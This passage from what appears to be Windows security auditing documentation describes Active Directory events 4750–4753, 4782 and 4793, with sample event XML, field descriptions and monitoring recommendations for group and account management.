    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
    <Data Name="SubjectUserName">dadmin</Data>
    <Data Name="SubjectDomainName">CONTOSO</Data>
    <Data Name="SubjectLogonId">0x3007b</Data>
    <Data Name="PrivilegeList">-</Data>
    <Data Name="SamAccountName">ServiceDeskMain</Data>
    <Data Name="SidHistory">-</Data>
  </EventData>
</Event>

Required Server Roles: Active Directory domain controller.


Minimum OS Version: Windows Server 2008.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested the “change group” operation. Event Viewer
automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the
source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that
user from the database and places it in the access token for that user. The system uses the SID in the access
token to identify the user in all subsequent interactions with Windows security. When a SID has been used as
the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For
more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “change group”
operation.
Account Domain [Type = UnicodeString]: subject’s domain name. Formats vary, and include the
following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Group:
Security ID [Type = SID]: SID of changed group. Event Viewer automatically tries to resolve SIDs and show
the group name. If the SID cannot be resolved, you will see the source data in the event.

Note Sometimes you can see that the Group\Security ID field contains an old group name in Event Viewer (as you can see in the event example). That happens because Event Viewer caches names for SIDs that it has already resolved for the current session.
Note The Security ID field has the same value as the new group name (Changed Attributes\SAM Account Name). That happens because the event is generated after the name was changed, and the SID resolves to the new name. It is always better to use the SID instead of group names for queries or filtering of events, because then you know for sure that this is the right object you are looking for or want to monitor.

Group Name [Type = UnicodeString]: the name of the group that was changed. For example: ServiceDesk
Group Domain [Type = UnicodeString]: domain name of changed group. Formats vary, and include the
following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
Built-in groups: Builtin
Changed Attributes:

Note If an attribute was not changed it will have the “-” value.

Note You might see a 4750 event without any changes inside, that is, where all Changed Attributes appear as “-”. This usually happens when a change is made to an attribute that is not listed in the event. In this case there is no way to determine which attribute was changed. For example, this would happen if you change the Description of a group object using the Active Directory Users and Computers administrative console. Also, if the discretionary access control list (DACL) is changed, a 4750 event will generate, but all attributes will be “-”.

SAM Account Name [Type = UnicodeString]: This is the new name of the changed group used to support
clients and servers from previous versions of Windows (pre-Windows 2000 logon name). If the value of the
sAMAccountName attribute of the group object was changed, you will see the new value here. For example:
ServiceDesk.
SID History [Type = UnicodeString]: contains previous SIDs used for the object if the object was moved
from another domain. Whenever an object is moved from one domain to another, a new SID is created and
becomes the objectSID. The previous SID is added to the sIDHistory property. If the value of sIDHistory
attribute of group object was changed, you will see the new value here.
Additional Information:
Privileges [Type = UnicodeString]: the list of user privileges which were used during the operation, for
example, SeBackupPrivilege. This parameter might not be captured in the event, and in that case appears as “-”.
See the full list of user privileges in “Table 8. User Privileges”.

Security Monitoring Recommendations
For 4750(S): A security-disabled global group was changed.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

If you have a list of critical distribution groups in the organization, and need to specifically monitor these
groups for any change, monitor events with the “Group\Group Name” values that correspond to the
critical distribution groups.
If you need to monitor each time a member is added to a distribution group, to see who added the member
and when, monitor this event. Typically, this event is used as an informational event, to be reviewed if
needed.
If your organization has naming conventions for account names, monitor “Attributes\SAM Account
Name” for names that don’t comply with the naming conventions.
4751(S): A member was added to a security-disabled global group.
4/5/2019 • 6 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Distribution Group Management
Event Description:
This event generates every time a new member is added to a security-disabled (distribution) global group.
This event generates only on domain controllers.
For every added member you will get a separate 4751 event.
You will typically see a “4750: A security-disabled global group was changed.” event without any changes in it prior to the 4751 event.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>4751</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>13827</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-08-15T00:01:10.821144700Z" />
    <EventRecordID>172221</EventRecordID>
    <Correlation />
    <Execution ProcessID="520" ThreadID="1108" />
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="MemberName">CN=Auditor,CN=Users,DC=contoso,DC=local</Data>
    <Data Name="MemberSid">S-1-5-21-3457937927-2839227994-823803824-2104</Data>
    <Data Name="TargetUserName">ServiceDeskSecond</Data>
    <Data Name="TargetDomainName">CONTOSO</Data>
    <Data Name="TargetSid">S-1-5-21-3457937927-2839227994-823803824-6119</Data>
    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
    <Data Name="SubjectUserName">dadmin</Data>
    <Data Name="SubjectDomainName">CONTOSO</Data>
    <Data Name="SubjectLogonId">0x3007b</Data>
    <Data Name="PrivilegeList">-</Data>
  </EventData>
</Event>

Required Server Roles: Active Directory domain controller.


Minimum OS Version: Windows Server 2008.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested the “add member to the group” operation. Event
Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will
see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that
user from the database and places it in the access token for that user. The system uses the SID in the access
token to identify the user in all subsequent interactions with Windows security. When a SID has been used as
the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For
more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “add member to the
group” operation.
Account Domain [Type = UnicodeString]: subject’s domain name. Formats vary, and include the
following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events that
might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Member:
Security ID [Type = SID]: SID of account that was added to the group. Event Viewer automatically tries to
resolve SIDs and show the group name. If the SID cannot be resolved, you will see the source data in the
event.
Account Name [Type = UnicodeString]: distinguished name of account that was added to the group. For
example: “CN=Auditor,CN=Users,DC=contoso,DC=local”. For some well-known security principals, such
as LOCAL SERVICE or ANONYMOUS LOGON, the value of this field is “-”.

Note The LDAP API references an LDAP object by its distinguished name (DN). A DN is a sequence of
relative distinguished names (RDN) connected by commas.
An RDN is an attribute with an associated value in the form attribute=value. These are examples of RDN
attributes:
• DC - domainComponent
• CN - commonName
• OU - organizationalUnitName
• O - organizationName

Group:
Security ID [Type = SID]: SID of the group to which new member was added. Event Viewer automatically
tries to resolve SIDs and show the group name. If the SID cannot be resolved, you will see the source data
in the event.
Group Name [Type = UnicodeString]: the name of the group to which new member was added. For
example: ServiceDesk
Group Domain [Type = UnicodeString]: domain name of the group to which new member was added.
Formats vary, and include the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
Built-in groups: Builtin
Additional Information:
Privileges [Type = UnicodeString]: the list of user privileges which were used during the operation, for
example, SeBackupPrivilege. This parameter might not be captured in the event, and in that case appears as “-”.
See the full list of user privileges in “Table 8. User Privileges”.
Security Monitoring Recommendations
For 4751(S): A member was added to a security-disabled global group.

TYPE OF MONITORING REQUIRED / RECOMMENDATION

Addition of members to distribution groups: You might need to monitor the addition of members to distribution groups.
    Recommendation: If you need to monitor each time a member is added to a distribution group, to see who added the member and when, monitor this event. Typically, this event is used as an informational event, to be reviewed if needed.

High-value distribution groups: You might have a list of critical distribution groups in the organization, and need to specifically monitor these groups for the addition of new members (or for other changes).
    Recommendation: Monitor this event with the “Group\Group Name” values that correspond to the high-value distribution groups.

High-value accounts: You might have high-value domain or local accounts for which you need to monitor each action. Examples of high-value accounts are database administrators, built-in local administrator account, domain administrators, service accounts, domain controller accounts and so on.
    Recommendation: Monitor this event with the “Subject\Security ID” and “Member\Security ID” that correspond to the high-value account or accounts.

Anomalies or malicious actions: You might have specific requirements for detecting anomalies or monitoring potential malicious actions. For example, you might need to monitor for use of an account outside of working hours.
    Recommendation: When you monitor for anomalies or malicious actions, use the “Subject\Security ID” (with other information) to monitor how or when a particular account is being used.

Non-active accounts: You might have non-active, disabled, or guest accounts, or other accounts that should never be used.
    Recommendation: Monitor this event with the “Subject\Security ID” and “Member\Security ID” that correspond to the accounts that should never be used.

Account whitelist: You might have a specific whitelist of accounts that are the only ones allowed to perform actions corresponding to particular events.
    Recommendation: If this event corresponds to a “whitelist-only” action, review the “Subject\Security ID” for accounts that are outside the whitelist.

Accounts of different types: You might want to ensure that certain actions are performed only by certain account types, for example, local or domain account, machine or user account, vendor or employee account, and so on.
    Recommendation: If this event corresponds to an action you want to monitor for certain account types, review the “Subject\Security ID” to see whether the account type is as expected.

External accounts: You might be monitoring accounts from another domain, or “external” accounts that are not allowed to perform certain actions (represented by certain specific events).
    Recommendation: Monitor this event for the “Subject\Account Domain” corresponding to accounts from another domain or “external” accounts.

Restricted-use computers or devices: You might have certain computers, machines, or devices on which certain people (accounts) should not typically perform any actions.
    Recommendation: Monitor the target Computer: (or other target device) for actions performed by the “Subject\Security ID” that you are concerned about.

Account naming conventions: Your organization might have specific naming conventions for account names.
    Recommendation: Monitor “Subject\Account Name” for names that don’t comply with naming conventions.
4752(S): A member was removed from a security-disabled global group.
4/5/2019 • 6 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Distribution Group Management
Event Description:
This event generates every time a member is removed from a security-disabled (distribution) global group.
This event generates only on domain controllers.
For every removed member you will get a separate 4752 event.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>4752</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>13827</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-08-15T00:20:57.315863900Z" />
    <EventRecordID>172229</EventRecordID>
    <Correlation />
    <Execution ProcessID="520" ThreadID="1108" />
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="MemberName">CN=Auditor,CN=Users,DC=contoso,DC=local</Data>
    <Data Name="MemberSid">S-1-5-21-3457937927-2839227994-823803824-2104</Data>
    <Data Name="TargetUserName">ServiceDeskSecond</Data>
    <Data Name="TargetDomainName">CONTOSO</Data>
    <Data Name="TargetSid">S-1-5-21-3457937927-2839227994-823803824-6119</Data>
    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
    <Data Name="SubjectUserName">dadmin</Data>
    <Data Name="SubjectDomainName">CONTOSO</Data>
    <Data Name="SubjectLogonId">0x3007b</Data>
    <Data Name="PrivilegeList">-</Data>
  </EventData>
</Event>

Required Server Roles: Active Directory domain controller.


Minimum OS Version: Windows Server 2008.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested the “remove member from the group” operation.
Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved,
you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that
user from the database and places it in the access token for that user. The system uses the SID in the access
token to identify the user in all subsequent interactions with Windows security. When a SID has been used as
the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For
more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “remove member
from the group” operation.
Account Domain [Type = UnicodeString]: subject’s domain name. Formats vary, and include the
following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Member:
Security ID [Type = SID]: SID of account that was removed from the group. Event Viewer automatically
tries to resolve SIDs and show the group name. If the SID cannot be resolved, you will see the source data
in the event.
Account Name [Type = UnicodeString]: distinguished name of account that was removed from the group.
For example: “CN=Auditor,CN=Users,DC=contoso,DC=local”. For some well-known security principals,
such as LOCAL SERVICE or ANONYMOUS LOGON, the value of this field is “-”.

Note The LDAP API references an LDAP object by its distinguished name (DN). A DN is a sequence of
relative distinguished names (RDN) connected by commas.
An RDN is an attribute with an associated value in the form attribute=value. These are examples of RDN
attributes:
• DC - domainComponent
• CN - commonName
• OU - organizationalUnitName
• O - organizationName

Group:
Security ID [Type = SID]: SID of the group from which the member was removed. Event Viewer
automatically tries to resolve SIDs and show the group name. If the SID cannot be resolved, you will see the
source data in the event.
Group Name [Type = UnicodeString]: the name of the group from which the member was removed. For
example: ServiceDesk
Group Domain [Type = UnicodeString]: domain name of the group from which the member was removed.
Formats vary, and include the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
Built-in groups: Builtin
Additional Information:
Privileges [Type = UnicodeString]: the list of user privileges which were used during the operation, for
example, SeBackupPrivilege. This parameter might not be captured in the event, and in that case appears as “-”.
See the full list of user privileges in “Table 8. User Privileges”.

Security Monitoring Recommendations
For 4752(S): A member was removed from a security-disabled global group.

TYPE OF MONITORING REQUIRED / RECOMMENDATION

Removal of members from distribution groups: You might need to monitor the removal of members from distribution groups.
    Recommendation: If you need to monitor each time a member is removed from a distribution group, to see who removed the member and when, monitor this event. Typically, this event is used as an informational event, to be reviewed if needed.

High-value distribution groups: You might have a list of critical distribution groups in the organization, and need to specifically monitor these groups for the removal of members (or for other changes).
    Recommendation: Monitor this event with the “Group\Group Name” values that correspond to the high-value distribution groups.

Distribution groups with required members: You might need to ensure that for certain distribution groups, particular members are never removed.
    Recommendation: Monitor this event with the “Group\Group Name” that corresponds to the group of interest, and the “Member\Security ID” of the members who should not be removed.

High-value accounts: You might have high-value domain or local accounts for which you need to monitor each action. Examples of high-value accounts are database administrators, built-in local administrator account, domain administrators, service accounts, domain controller accounts and so on.
    Recommendation: Monitor this event with the “Subject\Security ID” and “Member\Security ID” that correspond to the high-value account or accounts.

Anomalies or malicious actions: You might have specific requirements for detecting anomalies or monitoring potential malicious actions. For example, you might need to monitor for use of an account outside of working hours.
    Recommendation: When you monitor for anomalies or malicious actions, use the “Subject\Security ID” (with other information) to monitor how or when a particular account is being used.

Non-active accounts: You might have non-active, disabled, or guest accounts, or other accounts that should never be used.
    Recommendation: Monitor this event with the “Subject\Security ID” and “Member\Security ID” that correspond to the accounts that should never be used.

Account whitelist: You might have a specific whitelist of accounts that are the only ones allowed to perform actions corresponding to particular events.
    Recommendation: If this event corresponds to a “whitelist-only” action, review the “Subject\Security ID” for accounts that are outside the whitelist.

Accounts of different types: You might want to ensure that certain actions are performed only by certain account types, for example, local or domain account, machine or user account, vendor or employee account, and so on.
    Recommendation: If this event corresponds to an action you want to monitor for certain account types, review the “Subject\Security ID” to see whether the account type is as expected.

External accounts: You might be monitoring accounts from another domain, or “external” accounts that are not allowed to perform certain actions (represented by certain specific events).
    Recommendation: Monitor this event for the “Subject\Account Domain” corresponding to accounts from another domain or “external” accounts.

Restricted-use computers or devices: You might have certain computers, machines, or devices on which certain people (accounts) should not typically perform any actions.
    Recommendation: Monitor the target Computer: (or other target device) for actions performed by the “Subject\Security ID” that you are concerned about.

Account naming conventions: Your organization might have specific naming conventions for account names.
    Recommendation: Monitor “Subject\Account Name” for names that don’t comply with naming conventions.
4753(S): A security-disabled global group was deleted.
4/5/2019 • 3 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Distribution Group Management
Event Description:
This event generates every time a security-disabled (distribution) global group is deleted.
This event generates only on domain controllers.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4753</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13827</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-08-15T00:59:33.621155200Z" />
<EventRecordID>172230</EventRecordID>
<Correlation />
<Execution ProcessID="520" ThreadID="1504" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="TargetUserName">ServiceDeskSecond</Data>
<Data Name="TargetDomainName">CONTOSO</Data>
<Data Name="TargetSid">S-1-5-21-3457937927-2839227994-823803824-6119</Data>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x3007b</Data>
<Data Name="PrivilegeList">-</Data>
</EventData>
</Event>

Required Server Roles: Active Directory domain controller.


Minimum OS Version: Windows Server 2008.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested the “delete group” operation. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “delete group”
operation.
Account Domain [Type = UnicodeString]: subject’s domain name. Formats vary, and include the
following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Group:
Security ID [Type = SID]: SID of deleted group. Event Viewer automatically tries to resolve SIDs and show the group name. If the SID cannot be resolved, you will see the source data in the event.
Group Name [Type = UnicodeString]: the name of the group that was deleted. For example: ServiceDesk
Group Domain [Type = UnicodeString]: domain name of deleted group. Formats vary, and include the
following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
Built-in groups: Builtin
Additional Information:
Privileges [Type = UnicodeString]: the list of user privileges which were used during the operation, for
example, SeBackupPrivilege. This parameter might not be captured in the event, and in that case appears as “-”.
See full list of user privileges in “Table 8. User Privileges.”.

Security Monitoring Recommendations
For 4753(S): A security-disabled global group was deleted.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

If you have a list of critical distribution groups in the organization, and need to specifically monitor these groups for any change, especially group deletion, monitor events with the “Group\Group Name” values that correspond to the critical distribution groups.
If you need to monitor each time a distribution group is deleted, to see who deleted it and when, monitor this event. Typically, this event is used as an informational event, to be reviewed if needed.
Audit Other Account Management Events
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
Audit Other Account Management Events determines whether the operating system generates user account
management audit events.
Event volume: Typically Low on all types of computers.
This subcategory allows you to audit the following events:
The password hash of a user account was accessed. This happens during an Active Directory Management
Tool password migration.
The Password Policy Checking API was called. Password Policy Checking API allows an application to check
password compliance against an application-provided account database or single account and verify that
passwords meet the complexity, aging, minimum length, and history reuse requirements of a password
policy.

Computer Type: Domain Controller
General Success: Yes | General Failure: No | Stronger Success: Yes | Stronger Failure: No
Comments: The only reason to enable Success auditing on domain controllers is to monitor “4782(S): The password hash of an account was accessed.” This subcategory doesn’t have Failure events, so there is no recommendation to enable Failure auditing for this subcategory.

Computer Type: Member Server
General Success: No | General Failure: No | Stronger Success: No | Stronger Failure: No
Comments: The only event which is generated on Member Servers is “4793(S): The Password Policy Checking API was called.”; this event is a typical information event with little to no security relevance. This subcategory doesn’t have Failure events, so there is no recommendation to enable Failure auditing for this subcategory.

Computer Type: Workstation
General Success: No | General Failure: No | Stronger Success: No | Stronger Failure: No
Comments: The only event which is generated on Workstations is “4793(S): The Password Policy Checking API was called.”; this event is a typical information event with little to no security relevance. This subcategory doesn’t have Failure events, so there is no recommendation to enable Failure auditing for this subcategory.

Events List:
4782(S): The password hash of an account was accessed.
4793(S): The Password Policy Checking API was called.

4782(S): The password hash of an account was accessed.
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Other Account Management Events
Event Description:
This event generates on domain controllers during password migration of an account using Active Directory Migration Toolkit.
Typically “Subject\Security ID” is the SYSTEM account.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4782</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13829</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-08-18T21:23:46.435367800Z" />
<EventRecordID>174829</EventRecordID>
<Correlation />
<Execution ProcessID="512" ThreadID="1232" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="TargetUserName">Andrei</Data>
<Data Name="TargetDomainName">CONTOSO</Data>
<Data Name="SubjectUserSid">S-1-5-18</Data>
<Data Name="SubjectUserName">DC01$</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x3e7</Data>
</EventData>
</Event>

Required Server Roles: Active Directory domain controller.


Minimum OS Version: Windows Server 2008.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested hash migration operation. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested hash migration operation.
Account Domain [Type = UnicodeString]: subject’s domain name. Formats vary, and include the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For ANONYMOUS LOGON you will see NT AUTHORITY value for this field.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Target Account:
Account Name [Type = UnicodeString]: the name of the account for which the password hash was
migrated. For example: ServiceDesk
User account example: Andrei
Computer account example: DC01$
Account Domain [Type = UnicodeString]: domain name of the account for which the password hash was
migrated. Formats vary, and include the following:
Domain NETBIOS name example: FABRIKAM
Lowercase full domain name: fabrikam.local
Uppercase full domain name: FABRIKAM.LOCAL

Security Monitoring Recommendations
For 4782(S): The password hash of an account was accessed.
Monitor for all events of this type, because any actions with an account’s password hashes should be planned. If this action was not planned, investigate the reason for the change.
4793(S): The Password Policy Checking API was called.
4/5/2019 • 3 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Other Account Management Events
Event Description:
This event generates each time the Password Policy Checking API is called.
The Password Policy Checking API allows an application to check password compliance against an application-provided account database or single account and verify that passwords meet the complexity, aging, minimum length, and history reuse requirements of a password policy.
This event, for example, generates during the Directory Services Restore Mode (DSRM) account password reset procedure to check the new DSRM password.
This event generates on the computer where the Password Policy Checking API was called.
Note that starting with Microsoft SQL Server 2005, the “SQL Server password policy” feature can generate many 4793 events on a SQL Server.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4793</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13829</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-08-18T02:37:46.322424300Z" />
<EventRecordID>172342</EventRecordID>
<Correlation />
<Execution ProcessID="520" ThreadID="2964" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x36f67</Data>
<Data Name="Workstation">DC01</Data>
<Data Name="TargetUserName">-</Data>
<Data Name="Status">0x0</Data>
</EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested Password Policy Checking API operation. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested Password Policy Checking
API operation.
Account Domain [Type = UnicodeString]: subject’s domain name. Formats vary, and include the
following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Additional Information:
Caller Workstation [Type = UnicodeString]: name of the computer from which the Password Policy
Checking API was called. Typically, this is the same computer where this event was generated, for example,
DC01. Computer name here does not contain $ symbol at the end. It also can be an IP address or the DNS
name of the computer.
Provided Account Name (unauthenticated) [Type = UnicodeString]: the name of the account whose password was provided for validation. This parameter might not be captured in the event, and in that case appears as “-”.
Status Code [Type = HexInt32]: typically has the value “0x0”. The status code is “0x0” whether or not the password meets the domain Password Policy.

Security Monitoring Recommendations
For 4793(S): The Password Policy Checking API was called.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

Typically this is an informational event, and can give you information about when Password Policy Checking APIs were invoked, and who invoked them. The Provided Account Name does not always have a value: sometimes it’s not really possible to determine for which account the password policy check was performed.
Audit Security Group Management
4/5/2019 • 5 minutes to read

Applies to
Windows 10
Windows Server 2016
Audit Security Group Management determines whether the operating system generates audit events when
specific security group management tasks are performed.
Event volume: Low.
This subcategory allows you to audit events generated by changes to security groups such as the following:
Security group is created, changed, or deleted.
Member is added or removed from a security group.
Group type is changed.

Computer Type: Domain Controller
General Success: Yes | General Failure: No | Stronger Success: Yes | Stronger Failure: No
Comments: We recommend Success auditing of security groups, to see new group creation events, changes and deletion of critical groups. Also you will get information about new members of security groups, when a member was removed from a group and when security group membership was enumerated. This subcategory doesn’t have Failure events, so there is no recommendation to enable Failure auditing for this subcategory.

Computer Type: Member Server
General Success: Yes | General Failure: No | Stronger Success: Yes | Stronger Failure: No
Comments: We recommend Success auditing of security groups, to see new group creation events, changes and deletion of critical groups. Also you will get information about new members of security groups, when a member was removed from a group and when security group membership was enumerated. This subcategory doesn’t have Failure events, so there is no recommendation to enable Failure auditing for this subcategory.

Computer Type: Workstation
General Success: Yes | General Failure: No | Stronger Success: Yes | Stronger Failure: No
Comments: We recommend Success auditing of security groups, to see new group creation events, changes and deletion of critical groups. Also you will get information about new members of security groups, when a member was removed from a group and when security group membership was enumerated. This subcategory doesn’t have Failure events, so there is no recommendation to enable Failure auditing for this subcategory.
Events List:
4731(S): A security-enabled local group was created.
4732(S): A member was added to a security-enabled local group.
4733(S): A member was removed from a security-enabled local group.
4734(S): A security-enabled local group was deleted.
4735(S): A security-enabled local group was changed.
4764(S): A group’s type was changed.
4799(S): A security-enabled local group membership was enumerated.
